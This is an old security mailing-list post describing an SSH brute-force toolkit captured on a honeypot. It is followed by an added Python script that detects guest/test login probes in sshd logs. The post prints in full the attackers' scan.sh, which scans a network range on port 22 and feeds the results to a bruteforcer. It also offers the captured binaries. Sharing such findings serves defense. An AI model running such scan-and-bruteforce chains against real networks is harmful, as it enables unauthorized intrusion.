Message-ID: <20040729060545.GC5152@bumboclaat.ebat.org>
From: jethro at docisland.org (Jerome)
Subject: about the automated ssh login attempts

Hi list,

setting up a honeypot, I was able to identify some of the activity
associated with these login attempts. 
after the honeypot's been probed for guest and test login, I had someone
login as test and fetch some tools from websites to use them on the
honeypot.

tools were fetched from some .ro website as per .bash_history and
captured keystrokes.

the toolkit I had the opportunity to have downloaded by the kid on the
honeypot was made of a bunch of components:

- ss : a copy of the "very fast" syn scanner by haitateam published
  lately, at least on packetstorm

- haita: apparently the tool used to bruteforce accounts

	strings -a haita | grep SSH
	SSH login bruteforcer by HaitaTeam
	
	*tho* guest and test accounts seem hardcoded, so unless they fix
	that, it's not gonna be a big threat for all of the other joes
	accounts around.

and the final part:

- scan.sh: which is the kiddie's best friend for using these 2 tools
  altogether:

#!/bin/sh
if [ $# != 1 ]
then
	echo "Se da asa:"
	echo "$0 <clasa b>"
	echo "Exemplu:"
	echo "$0 212.93"
	echo "Daca nu prindeti ... verificati in fisieru \
asta sa fie pusa placa de retea care trebe adika \
eth0, eth1, ppp0 etc "

	exit
fi
rm -f bios.txt vuln.txt uniq.txt
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./haita
			
I also had some other toolkits on the honeypot after the breakin, most
of them being local root exploits packed in a single archive, and some
massrooter for years old remote vulnerabilities, but we all know them.

I can provide the bins if anyone's interested, but didn't bother
yet to place them on some website, feel free to email.

cheers,

-- 
Jerome
[pgp keyid : 33D7802F http://pgp.mit.edu]
[key fingerprint : 82E6 C9C8 05D1 BEAC 9353  8ECB CEAF 6A0A 33D7 802F]
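
Added example, not part of the original message or of the toolkit it describes: a small detector for the pattern reported above, a single source trying both the guest and test accounts over SSH, which also reports whether any of those logins succeeded. The log line layout (standard OpenSSH password-auth messages, with either "illegal user" or "invalid user") and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Account names the message reports as hardcoded in the bruteforcer.
PROBED_ACCOUNTS = {"guest", "test"}

# sshd password-auth lines; older OpenSSH wrote "illegal user", newer "invalid user".
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:(?:invalid|illegal) user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def find_probe_sources(lines):
    """Return {ip: {"users": set, "accepted": set}} for sources that tried
    every account in PROBED_ACCOUNTS; "accepted" holds the ones that got in."""
    seen = defaultdict(lambda: {"users": set(), "accepted": set()})
    for line in lines:
        m = AUTH_RE.search(line)
        if not m or m.group("user") not in PROBED_ACCOUNTS:
            continue
        entry = seen[m.group("ip")]
        entry["users"].add(m.group("user"))
        if m.group("result") == "Accepted":
            entry["accepted"].add(m.group("user"))
    # Only sources that touched all probed accounts match the reported pattern.
    return {ip: e for ip, e in seen.items() if e["users"] >= PROBED_ACCOUNTS}


# Constructed sample log lines (documentation addresses, not captured data).
SAMPLE_LOG = """\
Jul 29 04:10:01 hp sshd[2101]: Failed password for illegal user guest from 192.0.2.10 port 40112 ssh2
Jul 29 04:10:03 hp sshd[2103]: Accepted password for test from 192.0.2.10 port 40115 ssh2
Jul 29 04:12:40 hp sshd[2140]: Failed password for invalid user test from 198.51.100.7 port 51200 ssh2
Jul 29 04:15:09 hp sshd[2177]: Failed password for root from 203.0.113.5 port 33010 ssh2
Jul 29 04:16:30 hp sshd[2190]: Accepted password for alice from 192.0.2.44 port 50022 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, e in sorted(find_probe_sources(SAMPLE_LOG).items()):
        hit = ",".join(sorted(e["accepted"])) or "none"
        print(f"{ip}: tried {sorted(e['users'])}, accepted logins: {hit}")
```

A source with a non-empty "accepted" set is the case described in the message, where the probe was followed by an actual login, and is the one to triage first.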

